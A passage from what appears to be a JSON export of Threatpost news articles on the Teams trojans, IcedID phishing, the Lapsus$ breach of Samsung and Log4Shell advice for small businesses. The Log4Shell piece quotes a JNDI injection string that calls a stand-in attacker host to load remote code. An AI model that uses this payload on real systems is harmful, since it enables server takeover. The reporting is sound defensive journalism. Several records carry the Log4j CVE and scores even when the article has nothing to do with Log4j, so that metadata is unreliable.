departments or other companies to collaborate via the platform, and there is often \u201cminimal oversight\u201d over these requests because of the trust people have, he added.\n\n## **Specific Attack Vector**\n\nIn the attack vector Avanan researchers observed, attackers first access Teams through one of the aforementioned ways, such as a phishing email that spoofs a user, or through a lateral attack on the network.\n\nThen, the threat actor attaches a .exe file to a chat \u2013 called \u201cUser Centric\u201d \u2013 that is actually a trojan. To the end user, it looks legitimate, because it appears to be coming from a trusted user.\n\n\u201cWhen someone attaches a file to a Teams chat, particularly with the innocuous-sounding file name of \u2018User Centric,\u2019 many users won\u2019t think twice and will click on it,\u201d Fuchs wrote.\n\nIf that happens, the executable will then install DLL files that install malware as a Windows program and create shortcut links to self-administer on the victim\u2019s machine, he said. The ultimate goal of the malware is to take over control of the machine and perform other nefarious activities.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:11:48", "type": "threatpost", "title": "Microsoft Teams Targeted With Takeover Trojans", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:11:48", "id": "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "href": "https://threatpost.com/microsoft-teams-targeted-takeover-trojans/178497/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T14:30:43", "description": "The ever-evolving [banking trojan IcedID](<https://threatpost.com/icedid-web-forms-google-urls/165347/>) is back again with a phishing campaign that uses previously compromised Microsoft Exchange servers to send emails that appear to come from legitimate accounts. Attackers also are using stealthy new payload-delivery tactics to spread the modular malware.\n\nResearchers from [Intezer](<https://www.intezer.com/>) earlier this month uncovered the campaign, which employs thread hijacking to send malicious messages from stolen Exchange accounts, thus adding an extra level of evasion to the campaign\u2019s malicious intent, wrote researchers [Joakim Kennedy](<https://www.intezer.com/author/jkennedy/>) and [Ryan Robinson](<https://www.intezer.com/author/ryanrobinson/>) [in a blog post](<https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/>) published Monday.\n\nThe actors behind IcedID \u2013 as well as other spearphishers \u2013 have previously used phishing emails that \u201creuse previously stolen emails to make the lure more convincing,\u201d researchers wrote. However, this time the threat has evolved in a couple of key ways that make it even more dangerous to targets, which include organizations within energy, healthcare, law and pharmaceutical sectors, researchers noted.\n\nNot only is the threat actor now using compromised Microsoft Exchange servers to send the phishing emails from the account that they stole from, but the delivery of the malicious payload also has shifted in a way that can execute malware without the user even knowing, researchers said.\n\n\u201cThe payload has also moved away from using office documents to the use of ISO files with a Windows LNK file and a DLL file,\u201d researchers wrote. \u201cThe use of ISO files allows the threat actor to bypass the [Mark-of-the-Web](<https://attack.mitre.org/techniques/T1553/005/>) controls, resulting in execution of the malware without warning to the user.\u201d\n\nPreviously the infection chain most commonly associated with IcedID phishing campaigns has been an email with an attached password-protected ZIP archive that contains a macro-enabled Office document, which executes the IcedID installer.\n\n## **Breakdown of the Attack Chain**\n\nThe new campaign starts with a phishing email that includes a message about an important document and includes a password-protected ZIP archive file attached, the password for which is included in the email body.\n\nThe email seems extra convincing to users because it uses what\u2019s called \u201cthread hijacking,\u201d in which attackers use a portion of a previous thread from a legitimate email found in the inbox of the stolen account.\n\n\u201cBy using this approach, the email appears more legitimate and is transported through the normal channels which can also include security products,\u201d researchers wrote.\n\nThe majority of the originating Exchange servers that researchers observed in the campaign appear to be unpatched and publicly exposed, \u201cmaking the ProxyShell vector a good theory,\u201d they wrote. [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) is a remote-code execution (RCE) bug discovered in Exchange Servers last year that has since been patched but has been [throttled by attackers](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>).\n\nOnce unzipped, the attached file includes a single \u201cISO\u201d file with the same file name as the ZIP archive that was created not that long before the email was sent. That ISO file includes two files: a LNK file named \u201cdocument\u201d and a DLL file named \u201cmain,\u201d also prepared relatively recently and potentially used in previous phishing email, researchers said.\n\nWhen a user double clicks the LNK file, it uses \u201cregsvr32\u201d to execute the DLL file, which allows for proxy execution of malicious code in main.dll for defense evasion, they wrote in the post. The DLL file is a loader for the IcedID payload.\n\nThe loader will locate the encrypted payload, which is stored in the resource section of the binary, through the technique API hashing. The resulting hash is then compared with a hardcoded hash, locating the call for FindResourceA, which is dynamically called to fetch the encrypted payload, researchers wrote.\n\nThe ultimate step in the attack chain is that the IcedID \u201cGziploader\u201d payload is decoded and placed in memory and then executed. The GZiploader fingerprints the machine and sends a beacon to the command-and-control (C2) server \u2013 located at yourgroceries[.]top_._ \u2013 with information about the infected host, which then can be used for further nefarious activity.\n\n## **Evolution of a Threat**\n\nResearchers at IBM first discovered IcedID [back in 2017](<https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/>) as a trojan targeting banks, payment card providers, mobile services providers, payroll, web mail and e-commerce sites.\n\nThe malware has [evolved over the years](<https://threatpost.com/botnet-operators-team-up-to-leverage-icedid-trickbot-trojans/132392/>) and already has a storied history of clever obfuscation. For example, it [resurfaced](<https://threatpost.com/icedid-banker-adding-steganography-covid-19-theme/156718/>) during the [COVID-19 campaign](<https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware>) with new functionality that uses steganography \u2013 the practice of hiding code within images to stealthily infect victims \u2013 as well as other enhancements.\n\nThe new campaign is evidence of its [further evolution](<https://threatpost.com/spam-icedid-banking-trojan-variant/167250/>) and could signify that IcedID is indeed becoming, [as many fear](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), the new [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) \u2013 a modular threat that began as a trojan but steadily evolved into one of the most dangerous malwares ever seen.\n\n\u201cThis attack shows how much effort attackers put in all the time to evade detection and why defense in depth is necessary,\u201d observed Saumitra Das, CTO and co-founder at security firm [Blue Hexagon](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATURk7nu5DOXPXjQHtUbQPB-2Bo-3Dj4oZ_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Baowev7BWgf7-2Fsft7vhZ-2FleI4B1CtNAbekmGpeBhmEFQ0kWRSkTE0FzXKh-2Bz963fPXZn0hvo6ZGATosJpWWMJIx2kznvRhglY0WQkeZMakpGSSCIz9LKVoA7IXOHVn5P16MOaoTEh1LFaqgv30hL1UfNg9Za-2FKpoEtnwzBDLz4DtQVA3dFYwDxuvZKeD9Y8Hi4WQLnSai8UFna4-2BIEwYtA0NcX5KrsjsbSEnjBzFNfZ-2B0-3D>), in an email to Threatpost.\n\nThis time and effort, in turn, shows a level of sophistication on the part of those behind IcedID in that they have thorough knowledge of contemporary email protections and are continuously adding new tactics as security also grows and evolves, he said.\n\n\u201cMany email security systems use reputation of senders to block malicious email without being able to assess the email itself,\u201d Das noted. \u201cHere, they used compromised Exchange servers to make it through.\u201d\n\nThe group\u2019s use of obfuscated file formats to deliver malware, as well as the final payload\u2019s delivery over the network, also demonstrate that the threat actors know how to evade signature and sandboxes, he added.\n\n\u201cThese attacks often go much deeper than simply stealing data,\u201d concurred Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PZQLK_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYMmRr5z7OIF8mKih-2F25UI0RQa6-2Bdcn0eyt9a-2F-2BxbdAQ8flodV7haNCcr-2BW1iLqgw0DYt7ntjLmuD7PDGwxwwHSq2gHGWVXVmYGWcDbHq95V0DcFYQggLtmHop2EFskxujGp5A7HFr4-2Bzu8HP-2Fn84dnll5nv7EwsYGa4Z-2BkWEdDcrCAY75JBexQSBfFsv2LbL-2Bn1Qz-2FYzen2NsuzLcfAC1av2zq9EhGfkk9KycL0qVySQ-3D>)**, **in an email to Threatpost. \u201cThe cybercriminals take the time to read through the mailboxes to understand the inter-organization relationships and operating procedures.\n\n\u201cTo protect themselves from similar attacks, it\u2019s critical that organizations ensure that they apply security patches promptly and thoroughly in their environment,\u201d he added. However, what is historically true for patching remains true now: that it\u2019s \u201ca task that\u2019s easier said than done,\u201d Clemens acknowledged.\n\n\u201cIt really takes a cultural approach to cybersecurity to plan for failures in defenses like patch management,\u201d he said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T14:02:41", "type": "threatpost", "title": "Exchange Servers Speared in IcedID Phishing Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-29T14:02:41", "id": "THREATPOST:8243943141B8F18343765DA77D33F46C", "href": "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T19:35:26", "description": "Just days after leaking data it claims to have exfiltrated from chipmaker NVIDIA, ransomware group Lapsus$ is claiming another international company among its victims \u2014 this time releasing data purportedly stolen from Samsung Electronics.\n\nThe consumer electronics giant confirmed in a [media statement](<https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code>) on Monday that a \u201csecurity breach\u201d had occurred related to internal company data \u2014 but said that customer and employee data were not impacted.\n\nLapsus$ had earlier announced on its Telegram channel that it had [breached Samsung](<https://securityaffairs.co/wordpress/128712/cyber-crime/samsung-electronics-lapsus-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=samsung-electronics-lapsus-ransomware>) and offered a taste of what it had as proof, including biometric authentication information and source code from both Samsung and one of its suppliers, Qualcomm. That\u2019s according to Security Affairs, which also published a screen grab of the data leak.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07135942/lapsu-telegram-annoucement-screen-grab.jpg>)\n\nScreen capture of the Telegram message with data. Source: Security Affairs.\n\n\u201cIf Samsung\u2019s keys were leaked, it could compromise the TrustZone environment on Samsung devices that stores especially sensitive data, like biometrics, some passwords and other details,\u201d said Casey Bisson, head of product and developer relations at BluBracket, via email. \u201cThe TrustZone environment is useful because it creates a strong security barrier to attacks by Android malware.\u201d\n\nHe added that if the leaked data allows malware to access the TrustZone environment, it could make all data stored there vulnerable.\n\n\u201cIf Samsung has lost control of the signing keys, it could make it impossible for Samsung to securely update phones to prevent attacks on the TrustZone environment,\u201d he said. \u201cCompromised keys would make this a more significant attack [than NVIDIA](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), given the number of devices, their connection to consumers, and amount of very sensitive data that phones have.\n\n## **Ransomware Is Here to Stay **\n\nObviously, the implications of source code and thousands of employee credentials out in the open are serious. The [ransomware attacks](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>) on Samsung and NVIDIA, and even January\u2019s Lapsus$ attack on media outlets in Portugal, SIC Noticias and Expresso, should serve as a grim reminder that the [ransomware](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) business is booming, according to experts.\n\n> The websites of two of the main media organizations in Portugal [@expresso](<https://twitter.com/expresso?ref_src=twsrc%5Etfw>) and [@SICNoticias](<https://twitter.com/SICNoticias?ref_src=twsrc%5Etfw>) are down, after an apparent hacking, according to their parent company, Impresa. [pic.twitter.com/la2Pi9JRgG](<https://t.co/la2Pi9JRgG>)\n> \n> \u2014 Mia Alberti (@mialberti) [January 2, 2022](<https://twitter.com/mialberti/status/1477622312098840581?ref_src=twsrc%5Etfw>)\n\n\u201cRansomware is not going away,\u201d Dave Pasirstein, CPO and head of engineering for TruU told Threatpost by email. \u201cIt\u2019s a lucrative business that is nearly impossible to protect all risk vectors; however, it is made easy by enterprises failing to take enough precautionary steps.\u201d\n\n## **Ransomware Risk Vectors Abound **\n\nThose steps, according to Pasirstein, must include a zero-trust approach, an effective patching strategy, endpoint and email protection, employee training and strong authentication such as modern MFA. He added, \u201cideally, a password-less MFA that is not based on shared secrets and thus, cannot easily be bypassed by a server compromise.\u201d\n\nThe group\u2019s recent successes also highlight the need to protect data across the organization, Purandar Das, CEO of Sotero told Threatpost.\n\n\u201cObviously a very concerning development for Samsung and NVIDIA if true,\u201d he said. \u201cWhat this also demonstrates is the vulnerability of data in any data store within organizations.\u201d\n\nHe explained a common security approach is to focus on locking down structured data storage, which can be shortsighted.\n\n\u201cMost security has been focused on structured datastores with the assumption that the attackers are looking for confidential information that relates to individuals whether they are customers, consumers or employees,\u201d Das added. \u201cHowever, confidential or sensitive data is spread in more than just structured data stores.\u201d\n\nIn the case of Samsung, beyond releasing the company\u2019s competitive secrets, the Lapsus$ breach leaves the company open to future compromise, he warned.\n\n\u201cIn the case of Samsung, it would provide a pathway into any or many Samsung devices rendering them vulnerable in ways that wouldn\u2019t have been feasible,\u201d Das said. \u201cSecurity, or more importantly data-focused security, is essential. Securing the data is probably more critical or just as critical as todays security of attempting to lock down the perimeter.\u201d\n\n**_Register Today for [Log4j Exploit: Lessons Learned and Risk Reduction Best Practices](<https://bit.ly/3BXPL6S>) \u2013 a LIVE Threatpost event sked for Thurs., March 10 at 2PM ET. Join Sonatype code expert Justin Young as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T19:28:36", "type": "threatpost", "title": "Samsung Confirms Lapsus$ Ransomware Hit, Source Code Leak", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T19:28:36", "id": "THREATPOST:14D52B358840B9265FED987287C1E26E", "href": "https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d \u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, __co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpo__st)._\n\n_**Questions answered (click to jump to the appropriate section):**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the log4j library to log data. Because that library is almost ubiquitous in Java applications, virtually any business that has a website is highly likely to be affected. With one line of malicious code, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. \u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne: **In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit**: The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping into every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of product management at Invicti Security: **This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cA real world-attack can be as simple as the attack sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in[ this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers: **Attackers send requests to vulnerable applications, this triggers the vulnerability. The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers: **These kinds of wide sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendor\u2019s software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to __[Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)__, the log4j 2 library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. SMBs that have built applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers: **This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven: **\u201cWhile IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is __[available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading._ _Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman: **It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers: **I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. Any business using MSP services should reach out to their provider and request a status update on the Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** \u201cCyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\n\n**Invicti\u2019s Adam Goodman: **This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident is open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven: **A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman: **SMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies, [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\u201d\n\n**ESET\u2019s L\u00e9veill\u00e9: **As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cRemediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network to attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published[ a detailed technical 